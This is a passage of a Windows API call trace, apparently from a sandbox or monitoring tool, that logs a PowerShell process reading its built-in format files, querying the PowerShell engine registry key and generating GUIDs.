	[0605.256] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.256] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.256] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.257] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.260] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.261] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.261] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.262] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0605.262] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0xe67, lpOverlapped=0x0) returned 1
	[0605.262] ReadFile (in: hFile=0x310, lpBuffer=0x35b2de7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b2de7*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0605.263] ReadFile (in: hFile=0x310, lpBuffer=0x35b3818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x35b3818*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0605.263] CloseHandle (hObject=0x310) returned 1
	[0605.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0605.263] SetErrorMode (uMode=0x1) returned 0x1
	[0605.263] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0605.263] SetErrorMode (uMode=0x1) returned 0x1
	[0605.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0605.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x310) returned 0x0
	[0605.264] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0605.264] CoTaskMemAlloc (cb=0x5a) returned 0x49b830
	[0605.264] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x49b830, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0605.264] CoTaskMemFree (pv=0x49b830) 
	[0605.264] RegCloseKey (hKey=0x310) returned 0x0
	[0605.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0605.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0606.257] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x73a5dce0, Data2=0xadba, Data3=0x4973, Data4=([0]=0xa3, [1]=0xc1, [2]=0x3f, [3]=0xf8, [4]=0x3c, [5]=0xae, [6]=0xee, [7]=0x61))) returned 0x0
	[0606.258] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xe47d299c, Data2=0xd55a, Data3=0x4921, Data4=([0]=0x9e, [1]=0x69, [2]=0x3, [3]=0xf6, [4]=0xb, [5]=0x11, [6]=0x9, [7]=0xe9))) returned 0x0
	[0606.258] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x9d2f2316, Data2=0x3a86, Data3=0x4fec, Data4=([0]=0x84, [1]=0xf9, [2]=0x12, [3]=0xc9, [4]=0xc0, [5]=0xa6, [6]=0x4d, [7]=0x99))) returned 0x0
	[0606.259] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x4ae41a5f, Data2=0x18f7, Data3=0x47c3, Data4=([0]=0xab, [1]=0x4f, [2]=0xf6, [3]=0x99, [4]=0x80, [5]=0x3b, [6]=0x33, [7]=0xa2))) returned 0x0
	[0606.259] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xdca81bc3, Data2=0x5557, Data3=0x4fb4, Data4=([0]=0x81, [1]=0xa7, [2]=0x8a, [3]=0xe0, [4]=0x1c, [5]=0x8, [6]=0x1a, [7]=0x26))) returned 0x0
	[0606.260] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x5a5e454, Data2=0xc7e6, Data3=0x4165, Data4=([0]=0xbf, [1]=0x9a, [2]=0xb7, [3]=0x93, [4]=0x9c, [5]=0xf4, [6]=0x3, [7]=0x1c))) returned 0x0
	[0606.260] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xec9f2385, Data2=0xf598, Data3=0x4564, Data4=([0]=0xb3, [1]=0x1f, [2]=0x6a, [3]=0xa1, [4]=0x4a, [5]=0x89, [6]=0xb3, [7]=0x8c))) returned 0x0
	[0606.261] VirtualQuery (in: lpAddress=0x28c0a0, lpBuffer=0x28cf60, dwLength=0x30 | out: lpBuffer=0x28cf60*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0606.262] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xcfa67e4e, Data2=0x8f76, Data3=0x4c32, Data4=([0]=0xbd, [1]=0x5, [2]=0x95, [3]=0xc9, [4]=0x12, [5]=0x57, [6]=0x37, [7]=0xae))) returned 0x0
	[0606.263] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xf5ef7970, Data2=0x8dcc, Data3=0x45a2, Data4=([0]=0xa9, [1]=0xae, [2]=0xdf, [3]=0x58, [4]=0xae, [5]=0xc4, [6]=0x8c, [7]=0x85))) returned 0x0
	[0606.264] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xf3347b06, Data2=0xfa75, Data3=0x454d, Data4=([0]=0xb0, [1]=0x31, [2]=0xb6, [3]=0x99, [4]=0x5, [5]=0x83, [6]=0x9c, [7]=0x86))) returned 0x0
	[0606.264] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xfaede6f4, Data2=0xac55, Data3=0x4a3d, Data4=([0]=0x88, [1]=0x0, [2]=0x3, [3]=0x48, [4]=0xe3, [5]=0xd8, [6]=0xf0, [7]=0xf6))) returned 0x0
	[0606.264] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xa7b45683, Data2=0xa974, Data3=0x4ecc, Data4=([0]=0xa4, [1]=0x4f, [2]=0x80, [3]=0x4b, [4]=0x7e, [5]=0x6a, [6]=0x70, [7]=0x4b))) returned 0x0
	[0606.264] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x97c74034, Data2=0x4213, Data3=0x4dda, Data4=([0]=0x9f, [1]=0xfd, [2]=0xb2, [3]=0xf4, [4]=0x91, [5]=0x9f, [6]=0x2b, [7]=0x72))) returned 0x0
	[0606.264] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xe3c70b59, Data2=0x8a1, Data3=0x4cf3, Data4=([0]=0xaf, [1]=0x70, [2]=0xa, [3]=0x77, [4]=0x4d, [5]=0x19, [6]=0x20, [7]=0x9))) returned 0x0
	[0606.265] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x2bb2995b, Data2=0x9efe, Data3=0x472e, Data4=([0]=0xbd, [1]=0x37, [2]=0xfa, [3]=0x23, [4]=0xd, [5]=0x4f, [6]=0xef, [7]=0xc3))) returned 0x0
	[0606.265] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xbad9c2a6, Data2=0x8dea, Data3=0x4177, Data4=([0]=0x92, [1]=0xfa, [2]=0x99, [3]=0x2, [4]=0x5c, [5]=0x98, [6]=0x7c, [7]=0xfe))) returned 0x0
	[0606.265] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xbf56857d, Data2=0xb315, Data3=0x470e, Data4=([0]=0xa6, [1]=0x20, [2]=0x8c, [3]=0xa3, [4]=0x6f, [5]=0x7f, [6]=0x9, [7]=0xdc))) returned 0x0
	[0606.265] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xd4c431bc, Data2=0xec2e, Data3=0x464d, Data4=([0]=0xbf, [1]=0xde, [2]=0x3c, [3]=0x9d, [4]=0x2e, [5]=0x0, [6]=0xca, [7]=0xaa))) returned 0x0
	[0606.265] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xeea66679, Data2=0x7434, Data3=0x433b, Data4=([0]=0xa6, [1]=0x4, [2]=0x5b, [3]=0x21, [4]=0x61, [5]=0x4d, [6]=0x8c, [7]=0xb0))) returned 0x0
	[0606.265] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xdb5539ea, Data2=0xd8b8, Data3=0x4e23, Data4=([0]=0xbb, [1]=0xc5, [2]=0x5e, [3]=0xad, [4]=0xe6, [5]=0xa7, [6]=0xec, [7]=0xa4))) returned 0x0
	[0606.265] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x93944426, Data2=0x2912, Data3=0x427b, Data4=([0]=0x81, [1]=0x4a, [2]=0x61, [3]=0x20, [4]=0x42, [5]=0xd1, [6]=0x26, [7]=0x84))) returned 0x0
	[0606.266] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x87c59b84, Data2=0x7b0d, Data3=0x4aba, Data4=([0]=0x8f, [1]=0x97, [2]=0x27, [3]=0x70, [4]=0x60, [5]=0x1a, [6]=0x74, [7]=0x66))) returned 0x0
	[0606.266] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x1ae3f540, Data2=0x59f2, Data3=0x4da6, Data4=([0]=0x8f, [1]=0x2f, [2]=0xc8, [3]=0x4b, [4]=0xc5, [5]=0x7d, [6]=0x37, [7]=0xe1))) returned 0x0
	[0606.266] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xb04f4132, Data2=0xad87, Data3=0x49a6, Data4=([0]=0x8c, [1]=0xb0, [2]=0x3e, [3]=0xae, [4]=0xd6, [5]=0xc5, [6]=0xfb, [7]=0x2c))) returned 0x0
	[0606.266] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x31d93c36, Data2=0x5534, Data3=0x4e3b, Data4=([0]=0x96, [1]=0x7e, [2]=0x13, [3]=0x69, [4]=0xd4, [5]=0xf7, [6]=0x84, [7]=0xc5))) returned 0x0
	[0606.266] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x365a33c1, Data2=0x2d49, Data3=0x4bc9, Data4=([0]=0xa2, [1]=0x14, [2]=0xb7, [3]=0xbf, [4]=0x3, [5]=0x7d, [6]=0x2e, [7]=0x77))) returned 0x0
	[0606.266] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x8387a5b6, Data2=0x6046, Data3=0x4157, Data4=([0]=0xa0, [1]=0xee, [2]=0x45, [3]=0xfb, [4]=0x2e, [5]=0xa1, [6]=0xc4, [7]=0x38))) returned 0x0
	[0606.266] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xaaceb4bf, Data2=0xb40d, Data3=0x47b3, Data4=([0]=0xa5, [1]=0xb2, [2]=0x54, [3]=0x93, [4]=0x51, [5]=0x4, [6]=0x83, [7]=0x5d))) returned 0x0
	[0606.266] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x26fade37, Data2=0x26c9, Data3=0x42e0, Data4=([0]=0xa8, [1]=0xb5, [2]=0xcf, [3]=0x2a, [4]=0x4b, [5]=0xa7, [6]=0x41, [7]=0xd8))) returned 0x0
	[0606.267] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xb9a1649a, Data2=0xfb38, Data3=0x47f3, Data4=([0]=0x97, [1]=0x71, [2]=0x5b, [3]=0xb1, [4]=0xb9, [5]=0x1, [6]=0x1f, [7]=0x78))) returned 0x0
	[0606.267] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x72d91547, Data2=0x5a5e, Data3=0x4713, Data4=([0]=0xa6, [1]=0x78, [2]=0xb7, [3]=0xf, [4]=0xfa, [5]=0xe, [6]=0x1a, [7]=0x44))) returned 0x0
	[0606.267] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xb9924953, Data2=0xa9cd, Data3=0x4d49, Data4=([0]=0xbc, [1]=0xb0, [2]=0x7e, [3]=0x3c, [4]=0xff, [5]=0x6f, [6]=0x3d, [7]=0xa7))) returned 0x0
	[0606.267] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xdbdd4691, Data2=0x3132, Data3=0x480f, Data4=([0]=0xba, [1]=0xd3, [2]=0x6d, [3]=0x24, [4]=0x87, [5]=0xa5, [6]=0x7e, [7]=0xc9))) returned 0x0
	[0606.268] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x9d69aa4a, Data2=0xbea0, Data3=0x41dc, Data4=([0]=0xb8, [1]=0x8f, [2]=0x92, [3]=0x8b, [4]=0xbd, [5]=0xa8, [6]=0xce, [7]=0x24))) returned 0x0
	[0606.268] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xb2a83b2f, Data2=0xc5af, Data3=0x408d, Data4=([0]=0xa1, [1]=0x30, [2]=0x86, [3]=0xeb, [4]=0x69, [5]=0xe2, [6]=0x81, [7]=0x45))) returned 0x0
	[0606.269] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x9d0125e7, Data2=0x82b7, Data3=0x4c9b, Data4=([0]=0xbd, [1]=0xd5, [2]=0x9e, [3]=0x8d, [4]=0xd, [5]=0x2d, [6]=0x6f, [7]=0x4c))) returned 0x0
	[0606.269] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x16f91cea, Data2=0xc9a1, Data3=0x4890, Data4=([0]=0xa6, [1]=0xa8, [2]=0x86, [3]=0xc, [4]=0x9, [5]=0xa3, [6]=0x26, [7]=0xb0))) returned 0x0
	[0606.269] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xc0c17da2, Data2=0xf8ad, Data3=0x43b1, Data4=([0]=0xb3, [1]=0xa9, [2]=0x75, [3]=0x44, [4]=0xd3, [5]=0x6a, [6]=0x4c, [7]=0x67))) returned 0x0
	[0606.269] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xd2ee2b72, Data2=0xfaa9, Data3=0x491c, Data4=([0]=0x8e, [1]=0xf5, [2]=0x75, [3]=0x8e, [4]=0x6b, [5]=0x92, [6]=0x99, [7]=0x24))) returned 0x0
	[0606.269] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x202a5ad1, Data2=0xee, Data3=0x4eb3, Data4=([0]=0x8d, [1]=0xa5, [2]=0xa8, [3]=0xc5, [4]=0xe3, [5]=0xaf, [6]=0x1e, [7]=0xb4))) returned 0x0
	[0606.269] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xdb54432, Data2=0xe4a8, Data3=0x4556, Data4=([0]=0x9c, [1]=0x46, [2]=0xa4, [3]=0x1f, [4]=0x1f, [5]=0x9e, [6]=0xb1, [7]=0xb9))) returned 0x0
	[0606.270] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x1a134b93, Data2=0x6ab, Data3=0x4371, Data4=([0]=0xb6, [1]=0x7a, [2]=0x91, [3]=0x22, [4]=0x24, [5]=0x11, [6]=0x7f, [7]=0x26))) returned 0x0
	[0606.270] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x6f88ef48, Data2=0x235f, Data3=0x43e6, Data4=([0]=0xb9, [1]=0x59, [2]=0x27, [3]=0x1f, [4]=0x3b, [5]=0xab, [6]=0x88, [7]=0x9))) returned 0x0
	[0606.270] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xf59750c9, Data2=0x7518, Data3=0x4699, Data4=([0]=0xa0, [1]=0xf, [2]=0x34, [3]=0xc1, [4]=0x12, [5]=0xa6, [6]=0x22, [7]=0x31))) returned 0x0
	[0606.270] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xc55284f2, Data2=0x40bc, Data3=0x4913, Data4=([0]=0xb9, [1]=0x51, [2]=0xa8, [3]=0x6, [4]=0x69, [5]=0x80, [6]=0xe7, [7]=0x1a))) returned 0x0
	[0606.270] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xc48c4ae, Data2=0xe449, Data3=0x4276, Data4=([0]=0x8c, [1]=0xb3, [2]=0x31, [3]=0x47, [4]=0x68, [5]=0xb5, [6]=0x5f, [7]=0x84))) returned 0x0
	[0606.270] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0xd57116ac, Data2=0xb9, Data3=0x4369, Data4=([0]=0xa9, [1]=0xf2, [2]=0x4f, [3]=0xe8, [4]=0xff, [5]=0x90, [6]=0xeb, [7]=0xcd))) returned 0x0
	[0606.270] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x7fe8b7e3, Data2=0xdc2a, Data3=0x4c29, Data4=([0]=0xbb, [1]=0x58, [2]=0x18, [3]=0x56, [4]=0x50, [5]=0x8b, [6]=0x21, [7]=0x55))) returned 0x0
	[0606.271] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0606.271] GetFileType (hFile=0x310) returned 0x1
	[0606.271] SetErrorMode (uMode=0x1) returned 0x1
	[0606.271] GetFileType (hFile=0x310) returned 0x1
	[0606.271] ReadFile (in: hFile=0x310, lpBuffer=0x3547720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3547720*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0606.271] ReadFile (in: hFile=0x310, lpBuffer=0x3547720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3547720*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0606.272] ReadFile (in: hFile=0x310, lpBuffer=0x3547720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3547720*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0606.272] ReadFile (in: hFile=0x310, lpBuffer=0x3547720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3547720*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
	[0606.272] ReadFile (in: hFile=0x310, lpBuffer=0x3547720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3547720*, lpNumberOfBytesRead=0x28d438*=0x8b4, lpOverlapped=0x0) returned 1
	[0606.272] ReadFile (in: hFile=0x310, lpBuffer=0x3546b3c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3546b3c*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0606.272] ReadFile (in: hFile=0x310, lpBuffer=0x3547720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3547720*, lpNumberOfBytesRead=0x28d438*=0x0, lpOverlapped=0x0) returned 1
	[0606.272] CloseHandle (hObject=0x310) returned 1
	[0606.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0606.273] SetErrorMode (uMode=0x1) returned 0x1
	[0606.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d3e0 | out: lpFileInformation=0x28d3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0606.273] SetErrorMode (uMode=0x1) returned 0x1
	[0606.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0606.273] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d4c8 | out: phkResult=0x28d4c8*=0x310) returned 0x0
	[0606.273] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d44c, lpData=0x0, lpcbData=0x28d448*=0x0 | out: lpType=0x28d44c*=0x1, lpData=0x0, lpcbData=0x28d448*=0x56) returned 0x0
	[0606.273] CoTaskMemAlloc (cb=0x5a) returned 0x49b830
	[0606.273] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d41c, lpData=0x49b830, lpcbData=0x28d418*=0x56 | out: lpType=0x28d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d418*=0x56) returned 0x0
	[0606.273] CoTaskMemFree (pv=0x49b830) 
	[0606.274] RegCloseKey (hKey=0x310) returned 0x0
	[0606.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0606.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0606.274] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x867b8972, Data2=0xd8df, Data3=0x4b83, Data4=([0]=0xa2, [1]=0xf5, [2]=0x4f, [3]=0x4f, [4]=0xb4, [5]=0x51, [6]=0x6b, [7]=0x14))) returned 0x0
	[0606.274] CoCreateGuid (in: pguid=0x28d6f0 | out: pguid=0x28d6f0*(Data1=0x51461f30, Data2=0x3a91, Data3=0x4291, Data4=([0]=0xa1, [1]=0xf1, [2]=0x4d, [3]=0x13, [4]=0x67, [5]=0x3a, [6]=0x63, [7]=0xa7))) returned 0x0
	[0606.275] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0606.275] GetFileType (hFile=0x310) returned 0x1
	[0606.275] SetErrorMode (uMode=0x1) returned 0x1
	[0606.275] GetFileType (hFile=0x310) returned 0x1
	[0606.275] ReadFile (in: hFile=0x310, lpBuffer=0x3585508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d438, lpOverlapped=0x0 | out: lpBuffer=0x3585508*, lpNumberOfBytesRead=0x28d438*=0x1000, lpOverlapped=0x0) returned 1
